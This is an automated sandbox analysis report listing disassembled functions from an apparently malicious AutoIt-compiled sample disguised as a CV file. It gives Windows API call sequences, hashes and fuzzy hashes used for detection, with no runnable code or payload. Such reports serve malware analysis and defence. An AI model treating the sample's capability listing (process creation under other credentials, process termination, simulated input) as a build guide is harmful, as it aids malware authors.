Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 86a1d64ac4391030a27aa33ff6ef0fa4ba48d971de99292b32fc8e757ccc1b4b
Instruction ID: f3aaf843d0bc5f20005e7d8d0e5d66c6843ec034b9803c3615f63fb29d7dc5c2
Opcode Fuzzy Hash: 86a1d64ac4391030a27aa33ff6ef0fa4ba48d971de99292b32fc8e757ccc1b4b
Instruction Fuzzy Hash: DB41B0711017009FD722DF24DC94FB67BBCEF55724F140269FAA48A2E1C331A844DB62

Function 0035E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(003B1628,00000000,003B1628,00000000,00000000,003B1628,?,0036DC5D,00000000,?,00000000,00000000,00000000,?,0036DAD1,00000004), ref: 0035E40B
EnableWindow.USER32(00000000,00000000), ref: 0035E42F
ShowWindow.USER32(003B1628,00000000), ref: 0035E48F
ShowWindow.USER32(00000000,00000004), ref: 0035E4A1
EnableWindow.USER32(00000000,00000001), ref: 0035E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0035E4E8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 6166a116aa7cd9677913ee85af97b0335269522418539a867b308162818fa192
Instruction ID: bacce4b40ab5e5c66fde8560cf49806f1311d8539123dac6907a06ca93174a08
Opcode Fuzzy Hash: 6166a116aa7cd9677913ee85af97b0335269522418539a867b308162818fa192
Instruction Fuzzy Hash: E1414970601150EFDB2ACF25C499F947BE1BF09306F5981A9EE5C8F2B2C731A989CB51

Function 003398BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 003398D1

Part of subcall function 0030F4EA: std::exception::exception.LIBCMT ref: 0030F51E
Part of subcall function 0030F4EA: __CxxThrowException@8.LIBCMT ref: 0030F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00339908
EnterCriticalSection.KERNEL32(?), ref: 00339924
LeaveCriticalSection.KERNEL32(?), ref: 0033999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003399B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 003399D2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: d3fc695eefd71282fa6700f240b47f26c82e067ce5d3fcf7c120446d782cd2ee
Instruction ID: 9c3a04f8a13fcab9be1b958f574e5e7fbc78c14c834138a8bbf634549488fd44
Opcode Fuzzy Hash: d3fc695eefd71282fa6700f240b47f26c82e067ce5d3fcf7c120446d782cd2ee
Instruction Fuzzy Hash: BD319031A00105EFDB12AF95DC85A6AB7B8FF45310F1480A9E909AB286D770DA50CBA0

Function 00349B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,003477F4,?,?,00000000,00000001), ref: 00349B53

Part of subcall function 00346544: GetWindowRect.USER32(?,?), ref: 00346557

GetDesktopWindow.USER32 ref: 00349B7D
GetWindowRect.USER32(00000000), ref: 00349B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00349BB6

Part of subcall function 00337A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00337AD0

GetCursorPos.USER32(?), ref: 00349BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00349C44

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ca3d18acd6132cd105bee14d163913a0f809a49972325151fa7a66830dd2393b
Instruction ID: 94f87924260b105d4cb36e208321060dc878ebdf6d0f0c386070f04908cc1419
Opcode Fuzzy Hash: ca3d18acd6132cd105bee14d163913a0f809a49972325151fa7a66830dd2393b
Instruction Fuzzy Hash: 9731CF72104309ABC721DF14D889F9BB7EDFF89314F00091AF589EB181DA31EA44CB92

Function 0032AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0032AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0032AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0032AFC4
CloseHandle.KERNEL32(00000004), ref: 0032AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0032AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0032B012

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 656c5c92601200ca0df49d328435017db5751993ddec774b766061149d074fe0
Instruction ID: 9b30d979fd8dc8e71ab6f601e29fdbfb917438d30cf1b31b0f5e4269195fb4b6
Opcode Fuzzy Hash: 656c5c92601200ca0df49d328435017db5751993ddec774b766061149d074fe0
Instruction Fuzzy Hash: 002179B2104619BFDB138FA4EE09FAE7BADAF44304F044015FA05A2161D37A9D60EB61

Function 0035EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0030AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0030AFE3
Part of subcall function 0030AF83: SelectObject.GDI32(?,00000000), ref: 0030AFF2
Part of subcall function 0030AF83: BeginPath.GDI32(?), ref: 0030B009
Part of subcall function 0030AF83: SelectObject.GDI32(?,00000000), ref: 0030B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0035EC20
LineTo.GDI32(00000000,00000003,?), ref: 0035EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0035EC42
LineTo.GDI32(00000000,00000000,?), ref: 0035EC52
EndPath.GDI32(00000000), ref: 0035EC62
StrokePath.GDI32(00000000), ref: 0035EC72

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 5c0cbbe4d66e6004c6bc263cd7ef95822fc10786df2ede64456146443e7a5a11
Instruction ID: 09d63db30c0877bc2fdfc6d00c1333e435cd5e1faed9f73817137fe792446877
Opcode Fuzzy Hash: 5c0cbbe4d66e6004c6bc263cd7ef95822fc10786df2ede64456146443e7a5a11
Instruction Fuzzy Hash: A711097200014DBFEB129F90DC88EEA7F6DEF08354F048112FE0899160D7719E95DBA0

Function 0032E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0032E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0032E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0032E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0032E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0032E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0032E209

Part of subcall function 00329AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00329A05,00000000,00000000,?,00329DDB), ref: 0032A53A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 3ef473a30f68b5dcd4bca57cba5d3cbe41f6d1e33f3a724cf3b4f818bccb6083
Instruction ID: ebc29d635b6d7d59c0d9b182f5f1734799265801e1ef1329427425b44dcb131c
Opcode Fuzzy Hash: 3ef473a30f68b5dcd4bca57cba5d3cbe41f6d1e33f3a724cf3b4f818bccb6083
Instruction Fuzzy Hash: 990144B5A40715BFEB119BA5DC45F5EBFB9EF48751F004066EA08A7390D6719C01CBA0

Function 00317B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00317B47

Part of subcall function 0031123A: __initp_misc_winsig.LIBCMT ref: 0031125E
Part of subcall function 0031123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00317F51
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00317F65
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00317F78
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00317F8B
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00317F9E
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00317FB1
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00317FC4
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00317FD7
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00317FEA
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00317FFD
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00318010
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00318023
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00318036
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00318049
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0031805C
Part of subcall function 0031123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0031806F

__mtinitlocks.LIBCMT ref: 00317B4C

Part of subcall function 00317E23: InitializeCriticalSectionAndSpinCount.KERNEL32(003AAC68,00000FA0,?,?,00317B51,00315E77,003A6C70,00000014), ref: 00317E41

__mtterm.LIBCMT ref: 00317B55

Part of subcall function 00317BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00317B5A,00315E77,003A6C70,00000014), ref: 00317D3F
Part of subcall function 00317BBD: _free.LIBCMT ref: 00317D46
Part of subcall function 00317BBD: DeleteCriticalSection.KERNEL32(003AAC68,?,?,00317B5A,00315E77,003A6C70,00000014), ref: 00317D68

__calloc_crt.LIBCMT ref: 00317B7A
GetCurrentThreadId.KERNEL32 ref: 00317BA3

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: f6452e63054ad78ac7331c6b8fb251aaa0f0d1af265018fa41f69605a6325328
Instruction ID: 464bd484354bd9110ea0742ec5381795727e29a2accebfd89fb66ec839e8fc8b
Opcode Fuzzy Hash: f6452e63054ad78ac7331c6b8fb251aaa0f0d1af265018fa41f69605a6325328
Instruction Fuzzy Hash: 92F0623251D61119E66F76747C0B6CA26F89F0A730F298699F864CA1D1EB2588C28161

Function 002F27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 002F281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 002F2825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 002F2830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 002F283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 002F2843
MapVirtualKeyW.USER32(00000012,00000000), ref: 002F284B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c293b14749ba48efceb0e3cb6ccf7b04aec5d5b84e564f599a8ad7f7fb230620
Instruction ID: 123ea4940450e24f4972ec0f9c961ae3674ef81da5d8f91f88fbb4d76b056cab
Opcode Fuzzy Hash: c293b14749ba48efceb0e3cb6ccf7b04aec5d5b84e564f599a8ad7f7fb230620
Instruction Fuzzy Hash: C80167B0902B5ABDE3008F6A8C85B52FFB8FF19354F00411BA15C47A42C7F5A864CBE5

Function 00339AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: 57fd52905e04ecd35311d66969e27c827e8551522dee8be88ea9c1e4b0e8f26b
Instruction ID: 7d7ab349875376da41017ba14916b4d6199ae271c46af12d13672a1ade68c09a
Opcode Fuzzy Hash: 57fd52905e04ecd35311d66969e27c827e8551522dee8be88ea9c1e4b0e8f26b
Instruction Fuzzy Hash: 2E018136502211EBD7271B94EC88EEB777DFF88701F05096AF507A64A1DBB49841DB60

Function 00337BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00337C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00337C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00337C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00337C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00337C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00337C4C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: a765bfab8e8a3913e6825a237cbae4331fa5ee3eecf995871934b69d7781cf17
Instruction ID: fee5727f64c40870e517583515464e366e438b902f1ce624fd758665ee41a9cc
Opcode Fuzzy Hash: a765bfab8e8a3913e6825a237cbae4331fa5ee3eecf995871934b69d7781cf17
Instruction Fuzzy Hash: 74F03A76241158BBE7325B529C0EEEF7B7CEFC6B11F400028FA09A1051D7A05A81C6B5

Function 00339A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00339A33
EnterCriticalSection.KERNEL32(?,?,?,?,00365DEE,?,?,?,?,?,002FED63), ref: 00339A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00365DEE,?,?,?,?,?,002FED63), ref: 00339A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00365DEE,?,?,?,?,?,002FED63), ref: 00339A5E

Part of subcall function 003393D1: CloseHandle.KERNEL32(?,?,00339A6B,?,?,?,00365DEE,?,?,?,?,?,002FED63), ref: 003393DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00339A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00365DEE,?,?,?,?,?,002FED63), ref: 00339A78

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 48153b85da3949fd5a29c4e55cf646f08750b0c77f3aa415c413c17595d6a4cb
Instruction ID: 4532eba5503dd8b5641d67c98302c902ae1408833e7d1b18abb9db9c913a23f4
Opcode Fuzzy Hash: 48153b85da3949fd5a29c4e55cf646f08750b0c77f3aa415c413c17595d6a4cb
Instruction Fuzzy Hash: 22F05E36141211EBD7231BA4EC89EAB773DFF84301F150966F507A50B1DBB59842DB60

Function 002F1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0030F4EA: std::exception::exception.LIBCMT ref: 0030F51E
Part of subcall function 0030F4EA: __CxxThrowException@8.LIBCMT ref: 0030F533

__swprintf.LIBCMT ref: 002F1EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 002F1D49

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 1219d980adfe7a2ce7594cf2701700ac91c6471dea3f9eb58dcc9e0492078fbc
Instruction ID: 21b24bd0a655aea007021a80056f16289929b8911621b0831b1620bdfa6805ea
Opcode Fuzzy Hash: 1219d980adfe7a2ce7594cf2701700ac91c6471dea3f9eb58dcc9e0492078fbc
Instruction Fuzzy Hash: F5918E711242099FC716EF24C895C7AF7A4FF95780F40492DFA869B2A1DB70ED24CB52

Function 0034AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0034B006
CharUpperBuffW.USER32(?,?), ref: 0034B115
VariantClear.OLEAUT32(?), ref: 0034B298

Part of subcall function 00339DC5: VariantInit.OLEAUT32(00000000), ref: 00339E05
Part of subcall function 00339DC5: VariantCopy.OLEAUT32(?,?), ref: 00339E0E
Part of subcall function 00339DC5: VariantClear.OLEAUT32(?), ref: 00339E1A

Strings

Incorrect Parameter format, xrefs: 0034B03E, 0034B20B
AUTOIT.ERROR, xrefs: 0034B11B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 0025a542fd46167954f9bae096e14432b894158c10a6cd553b568bcb44228f89
Instruction ID: 4a5383933b4daec246f2934a76b0a22bf303fddb282cbbb72464ac1b31c15411
Opcode Fuzzy Hash: 0025a542fd46167954f9bae096e14432b894158c10a6cd553b568bcb44228f89
Instruction Fuzzy Hash: 02918A306083059FCB11DF24C48196AFBF8EF89744F14486EF98A9B3A2DB31E945CB52

Function 00335347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0030C6F4: _wcscpy.LIBCMT ref: 0030C717

_memset.LIBCMT ref: 00335438
GetMenuItemInfoW.USER32(?), ref: 00335467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00335513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0033553D

Strings

0, xrefs: 00335430

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: e8ce3ae46796bc94974698af9579f0a78bd54171c3461d0fb5857ce7f9198d7d
